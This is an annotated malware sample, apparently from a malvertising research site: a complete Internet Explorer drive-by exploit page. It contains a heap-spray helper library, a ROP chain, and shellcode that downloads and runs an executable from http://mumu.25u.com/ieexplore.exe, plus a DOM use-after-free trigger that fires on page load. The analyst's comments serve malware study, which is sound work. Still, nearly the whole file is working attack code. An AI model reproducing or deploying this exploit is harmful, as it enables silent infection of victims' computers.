StopMalvertising

ieexp.htm

Jan 19th, 2013
<!doctype html>
<html>
<head>
<!--
  Malware sample: an Internet Explorer heap-spray exploit page.  Do not load
  in a browser outside an isolated analysis VM.
  Structure of the file:
    (1) a heapLib-style helper library attached as mmfuncLib.ie;
    (2) a parse-time heap spray of a payload blob that has the shape of a
        ROP chain plus a download-and-execute stub (a URL is embedded);
    (3) AAFunc11(), a DOM manipulation sequence run from <body onload>
        that is the actual trigger.
-->
<script>
// Empty namespace function; the helper constructor is attached to it as
// mmfuncLib.ie in the next <script> block.
function mmfuncLib() {
}
</script>
  8. <script>
// Heap-manipulation helper for Internet Explorer (heapLib-style).
//
//   maxAlloc  upper bound, in bytes, on the BSTR footprint of the padding
//             string (4-byte length prefix + UTF-16 data + 2-byte terminator);
//             falsy values (including 0) fall back to 65535.
//   heapBase  assumed base address of the process heap, used only by
//             lookasideAddr(); falsy values fall back to 0x150000.
//
// The constructor ends by calling flushOleaut32(), which pre-fills the
// OLEAUT32 string cache (see that method); the library's stated intent is
// that later frees then reach the real heap instead of the cache.
mmfuncLib.ie = function(maxAlloc, heapBase) {
  var pad = "AAAA";

  this.maxAlloc = maxAlloc || 65535;
  this.heapBase = heapBase || 0x150000;

  // Double the padding string until one more doubling would push its BSTR
  // size to or past maxAlloc.
  while (4 + pad.length * 2 + 2 < this.maxAlloc) {
    pad += pad;
  }
  this.paddingStr = pad;

  // Allocations are kept alive here, grouped by tag, so that a whole group
  // can be dropped at once by freeOleaut32(tag).
  this.mem = [];

  this.flushOleaut32();
};
  19.  
// Debug hook.  The call has no effect on the page: its result is discarded
// and 0xbabe is a marker value, presumably so a debugger breakpoint on
// Math.atan2 can pick up `msg`.  Safe to ignore when reading the exploit.
mmfuncLib.ie.prototype.debug = function(msg) {
  Math.atan2(0xbabe, msg);
};
  23.  
// Allocate one block via JScript's string allocator and keep it alive
// under `tag`.
//
//   arg  either the string to allocate, or a block size in bytes, in which
//        case a padding string of the matching BSTR footprint is used.
//   tag  group key for freeOleaut32(); an undefined tag is stored under
//        the key "undefined" (and is never freed by this file).
//
// Throws a string if the computed size is not a multiple of 16.
mmfuncLib.ie.prototype.allocOleaut32 = function(arg, tag) {
  var isString = (typeof arg == "string" || arg instanceof String);

  // BSTR footprint: 4-byte length prefix + UTF-16 payload + 2-byte terminator.
  var size = isString ? 4 + arg.length * 2 + 2 : arg;

  if ((size & 0xf) != 0)
    throw "Allocation size " + size + " must be a multiple of 16";

  var group = this.mem[tag];
  if (group === undefined) {
    group = [];
    this.mem[tag] = group;
  }

  // For a string, substr() over the full length is a semantic no-op; it is
  // presumably there to obtain a separate string object rather than a
  // reference to `arg`.  For a size, (arg - 6) / 2 is the number of UTF-16
  // units whose BSTR footprint is exactly `arg` bytes.
  if (isString) {
    group.push(arg.substr(0, arg.length));
  } else {
    group.push(this.padding((arg - 6) / 2));
  }
};
  50.  
  51.  
// Debug hook with no page-visible effect: picks Math.atan when `enable` is
// loosely equal to true and Math.asin otherwise, and calls it with the
// marker value 0xbabe (presumably for a debugger breakpoint).
mmfuncLib.ie.prototype.debugHeap = function(enable) {
  var hook = (enable == true) ? Math.atan : Math.asin;
  hook(0xbabe);
};
  59.  
// Debug hook: calls Math.acos with the marker value 0xbabe and discards the
// result.  `msg` is accepted but never used.
mmfuncLib.ie.prototype.debugBreak = function(msg) {
  Math.acos(0xbabe);
};
// Return the first `len` UTF-16 units of the pre-built padding string.
// Throws a string if more is requested than was built by the constructor.
mmfuncLib.ie.prototype.padding = function(len) {
  var available = this.paddingStr.length;
  if (len > available)
    throw "Requested padding string length " + len + ", only " + available + " available";
  return this.paddingStr.substr(0, len);
};
// Round `num` up to the next multiple of `round`.  Throws a string when
// `round` is loosely equal to 0.  Note the truncation goes through
// parseInt(), i.e. via the number's string form, truncating toward zero.
mmfuncLib.ie.prototype.round = function(num, round) {
  if (round == 0)
    throw "Round argument cannot be 0";

  var scaled = (num + (round - 1)) / round;
  return parseInt(scaled, 10) * round;
};
  75.  
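// Format `num` as upper-case hexadecimal, zero-padded to at least `width`
// digits (no padding when `width` is falsy).
//
// The value is treated as unsigned 32-bit: the original loop already
// shifted with `>>>`, but its `num > 0xF` guard is false for a negative
// (sign-extended) input, which then came out as a single digit.  Masking
// with `>>> 0` first makes e.g. -1 format as "FFFFFFFF"; inputs in
// [0, 2^32) are unaffected.  Values of 2^32 or more are truncated to
// their low 32 bits.
mmfuncLib.ie.prototype.hex = function(num, width) {
  var digits = "0123456789ABCDEF";
  var value = num >>> 0;

  var hex = digits.charAt(value & 0xF);
  while (value > 0xF) {
    value = value >>> 4;
    hex = digits.charAt(value & 0xF) + hex;
  }

  var minWidth = width || 0;
  while (hex.length < minWidth)
    hex = "0" + hex;

  return hex;
};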
// Encode a 32-bit value as a two-unit JS string: low 16 bits first, then
// high 16 bits.  Each %uXXXX becomes one UTF-16 unit, so as UTF-16LE bytes
// in memory the four bytes form the little-endian dword `addr`.
mmfuncLib.ie.prototype.addr = function(addr) {
  var low = this.hex(addr & 0xFFFF, 4);
  var high = this.hex((addr >> 16) & 0xFFFF, 4);
  return unescape("%u" + low + "%u" + high);
};
// Drop every block kept under `tag`, then force a collection.
// CollectGarbage() is a JScript-specific global (it does not exist in other
// engines); it is what turns "unreferenced" into "actually freed".
mmfuncLib.ie.prototype.freeOleaut32 = function(tag) {
  var pool = this.mem;
  delete pool[tag];
  CollectGarbage();
};
  105.  
// General-purpose allocation: same as allocOleaut32() but refuses the four
// sizes that flushOleaut32() keeps pinned in the OLEAUT32 cache
// (32, 64, 256 and 32768 bytes).  `arg` may be a string or a byte size;
// `tag` is the free group (undefined -> stored under "undefined").
// Throws a string for a refused size; allocOleaut32() adds its own checks.
mmfuncLib.ie.prototype.alloc = function(arg, tag) {
  var isString = (typeof arg == "string" || arg instanceof String);
  var size = isString ? 4 + arg.length * 2 + 2 : arg;

  var pinned = [32, 64, 256, 32768];
  for (var i = 0; i < pinned.length; i++) {
    if (size == pinned[i])
      throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
  }

  this.allocOleaut32(arg, tag);
};
  123.  
  124.  
// Free the group `tag` and immediately re-fill the OLEAUT32 cache so the
// released memory is not simply reclaimed by the cache (see flushOleaut32).
mmfuncLib.ie.prototype.free = function(tag) {
  this.freeOleaut32(tag);   // delete group + CollectGarbage()
  this.flushOleaut32();
};
  133.  
// Run the JScript garbage collector (CollectGarbage is IE-only), then
// re-fill the OLEAUT32 cache.  The debug() call is a no-op hook.
mmfuncLib.ie.prototype.gc = function() {
  this.debug("Running the garbage collector");
  CollectGarbage();
  this.flushOleaut32();
};
  141.  
// Create `count` (default 1) free chunks of the size of `arg`, each
// separated by a block that stays allocated.  The untagged allocations go
// under the key "undefined" and are never freed by this file; presumably
// the interleaving is meant to stop the freed chunks from coalescing.
mmfuncLib.ie.prototype.freeList = function(arg, count) {
  var wanted = count || 1;

  for (var i = 0; i < wanted; i++) {
    this.alloc(arg);               // kept
    this.alloc(arg, "freeList");   // released below
  }
  this.alloc(arg);                 // closing kept block

  this.free("freeList");
};
  154.  
// Release the previous "oleaut32" group and then allocate six blocks of
// each of the four sizes (32, 64, 256, 32768) that alloc() refuses to hand
// out.  The stated purpose, per alloc()'s error text, is to keep the
// OLEAUT32 string cache occupied by these sizes.
mmfuncLib.ie.prototype.flushOleaut32 = function() {
  this.debug("Flushing the OLEAUT32 cache");

  this.freeOleaut32("oleaut32");

  var sizes = [32, 64, 256, 32768];
  for (var round = 0; round < 6; round++) {
    for (var j = 0; j < sizes.length; j++)
      this.allocOleaut32(sizes[j], "oleaut32");
  }
};
  172.  
// Allocate `count` (default 1) blocks of the size of `arg` under the
// "lookaside" tag and free them together.  Sizes must be a multiple of 16
// and, with 8 extra bytes (presumably a heap chunk header), stay below
// 1024 -- i.e. at most 1008 bytes of payload.  Throws strings otherwise.
mmfuncLib.ie.prototype.lookaside = function(arg, count) {
  var isString = (typeof arg == "string" || arg instanceof String);
  var size = isString ? 4 + arg.length * 2 + 2 : arg;

  if ((size & 0xf) != 0)
    throw "Allocation size " + size + " must be a multiple of 16";

  if (size + 8 >= 1024)
    throw("Maximum lookaside block size is 1008 bytes");

  var wanted = count || 1;
  for (var i = 0; i < wanted; i++)
    this.alloc(arg, "lookaside");

  this.free("lookaside");
};
  197.  
// Predict the address of the lookaside list entry for blocks of the size
// of `arg`.  Same size checks as lookaside().  The formula assumes a fixed
// layout: entries of 48 bytes, indexed by (size + 8) / 8, starting 0x688
// bytes past heapBase.  None of those constants are derived in this file;
// they encode one particular heap-manager layout.
mmfuncLib.ie.prototype.lookasideAddr = function(arg)
{
  var isString = (typeof arg == "string" || arg instanceof String);
  var size = isString ? 4 + arg.length * 2 + 2 : arg;

  if ((size & 0xf) != 0)
    throw "Allocation size " + size + " must be a multiple of 16";

  if (size + 8 >= 1024)
    throw("Maximum lookaside block size is 1008 bytes");

  var index = (size + 8) / 8;
  return this.heapBase + 0x688 + index * 48;
};
  220.  
// Build a fake-vtable blob (heapLib helper).  NOT called anywhere in this
// file.  Layout in bytes, as far as the code shows:
//   [0..3]     90 90 EB 7C  - two NOPs and a short `jmp +0x7c`, which lands
//                            at byte 128, just past the pointer table
//   [4..127]   124/4 = 31 copies of the `jmpecx` address
//   [128..131] 28 00 28 00  - the jump target, directly before the shellcode
//   [132..]    shellcode, then padding up to `size`
// 138 = 4 + 124 + 4 + the 6 bytes of BSTR prefix/terminator that
// allocOleaut32() also accounts for, hence (size - 138) / 2 units remain
// for shellcode + padding.
//
// BUG (left as-is): `heap.padding(...)` refers to a global `heap` that is
// never defined in this file (the instance is `heap_obj`), so a call would
// throw a ReferenceError at that line.  Since the method is dead code in
// this sample it is documented rather than changed.
mmfuncLib.ie.prototype.vtable = function(shellcode, jmpecx, size) {
  var vtable = unescape("%u9090%u7ceb")
  var size = (size ? size : 1008);

  if ((size & 0xf) != 0)
    throw "Vtable size " + size + " must be a multiple of 16";

  if (shellcode.length*2 > size-138)
    throw("Maximum shellcode length is " + (size-138) + " bytes");

  // 31 pointers = 124 bytes
  for (var i = 0; i < 124/4; i++)
    vtable += this.addr(jmpecx);

  // `heap` is undefined here (see BUG above)
  vtable += unescape("%u0028%u0028") +
  shellcode + heap.padding((size-138)/2 - shellcode.length);

  return vtable;
}
  243.  
  244.  
// ------------------------------------------------------------------------
// Parse-time heap spray.  Everything here runs while <head> is still being
// parsed, i.e. before <body onload> invokes AAFunc11() below.
// ------------------------------------------------------------------------

// Padding strings capped at 0x20000 bytes; heapBase stays at the library
// default.  The constructor also pre-fills the OLEAUT32 cache.
var heap_obj = new mmfuncLib.ie(0x20000);

// Payload, part 1.  Each %uXXXX is one UTF-16 unit = two little-endian
// bytes, so a pair such as %u5ed6%u77bc spells the dword 0x77bc5ed6.  That
// dword is repeated dozens of times, then a short run of other
// 0x77bc....-0x77d0.... values interleaved with small constants (0x400,
// 0x40).  This has the shape of a ROP chain against a module at a fixed,
// non-ASLR base; the module is not named anywhere in the file, so identify
// it from the target's loaded-module list before asserting which one.  The
// "..."+"..." splits inside the literal cut through the escape sequences,
// presumably to defeat naive signature matching.
var code = unescape("%u5"+"ed6%u77bc%u5ed6%u7"+"7bc%u5ed6%u77bc%u5ed6%u77bc%"+"u5ed6%u77bc%u5ed6%u77bc%u5ed6"+"%u77bc%u5ed6%u77bc%u5ed6%u77bc%"+"u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u5ed6%u77bc%u362c%u77bd%u5ed5%u77bc%uee15%u77be%uee15%u77be%ufa1c%u77bf%u0400%u0000%u0d13%u77c0%u0040%u0000%ueeef%u77be%ud9bb%u77c0%ua88c%u77bd%u9f92%u77be%ua184%u77be%uaacc%u77bd%ub860%u77be%u1120%u77bc%u3ad9%u77d0%u1025%u77c0");
// Payload, part 2: raw machine code.  Reading the units as bytes shows
// `68 6f 6e 00 00 68 75 72 6c 6d` near the start (two push-immediates that
// spell "urlmon"), a write of the string "\a.exe" a little further on,
// and, at the very end, the ASCII string "http://mumu.25u.com/ieexplore.exe"
// followed by a NUL.  That is consistent with a download-and-execute stub;
// treat the URL and the file name as indicators of compromise.
code +=unescape(
"%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000" +
"%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516" +
"%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456" +
"%u04c7%u5c03%u2e61%uc765%u0344%u7804%u0065%u3300" +
"%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856" +
"%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503%u8b56" +
"%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be" +
"%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775" +
"%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd" +
"%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e" +
"%uc1ec%ue579%u98b8%u8afe%uef0e%ue0ce%u3660%u2f1a" +
"%u6870%u7474%u3a70%u2f2f%u756d%u756d%u322e%u7535" +
"%u632e%u6d6f%u692f%u6565%u7078%u6f6c%u6572%u652e" +
"%u6578%u0000");

// Filler: the 4-byte pattern 79 45 6d 79 ("yEmy"), doubled up to exactly
// 0x80000 units.  Whether it is meant to be executable filler or pure
// alignment is not stated by the file.
var nops = unescape("%u4579%u796d");
while (nops.length < 0x80000) nops += nops;
// One period = 0x800 units (0x1000 bytes): 0x586 units (0xb0c bytes) of
// filler, then `code`, then filler to the end of the period.  (`shellcode`
// here is the repeated spray pattern, not just the machine code.)
var offset = nops.substring(0, 0x586);
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
// (0x80000 - 6) / 2 units: with the 4-byte length prefix and 2-byte
// terminator every sprayed BSTR is exactly 0x80000 bytes.
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
// 0x2ff allocations x 0x80000 bytes ~ 383 MiB of identical blocks.  The
// trigger below steers execution to 0x0c0c0b30; 0xb30 mod 0x1000 is 0x24
// bytes past where `code` starts in each period, i.e. inside the repeated
// dword run.  That is consistent with it being the intended landing spot,
// modulo the BSTR prefix and allocation alignment -- confirm in a debugger.
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
  274.  
  275.  
// Trigger.  Invoked from <body onload> once the spray above has run.
// The DOM sequence below is the whole bug-specific part of the exploit;
// its exact order matters and should not be "tidied".  It resembles the
// publicly analysed Internet Explorer 8 use-after-free exploits of
// Dec 2012 / Jan 2013 (commonly attributed to CVE-2012-4792), but nothing in
// this file names a CVE -- treat that as an analyst's attribution, not a
// fact of the sample.
function AAFunc11()
{
var e0 = null;
var e1 = null;
var e2 = null;

try {
e0 = document.getElementById("a");   // <form id="a"> from the page body
e1 = document.getElementById("b");   // <dfn id="b">  from the page body
e2 = document.createElement("q");
e1.applyElement(e2);                 // applyElement is IE-only
e1.appendChild(document.createElement('button'));
e1.applyElement(e0);
e2.outerText = "";                   // replaces e2's content/element text
e2.appendChild(document.createElement('body'));
} catch(e) { }                       // any DOM failure is swallowed; page stays silent
// JScript-only; forces collection of whatever the sequence above released.
CollectGarbage();
var eip = window;                    // plain alias for window
var data = "UWIhkMJUrpWyguJFdkZuczuabURjXtlNWejnRstva";
// Navigating window.location with a string whose first two UTF-16 units are
// 0x0b30,0x0c0c.  As UTF-16LE bytes these are 30 0b 0c 0c = the dword
// 0x0c0c0b30, an address inside the region sprayed above.  Presumably the
// string buffer itself is what gets placed where the freed object was, with
// `data` as filler; verify against the actual crash in a debugger.
eip.location = unescape("%u0b30%u0c0c" + data);
}
  297.  
  298. </script>
  299. </head><body onload="eval(AAFunc11())"><form id="a"></form><dfn id="b"></dfn></body></html>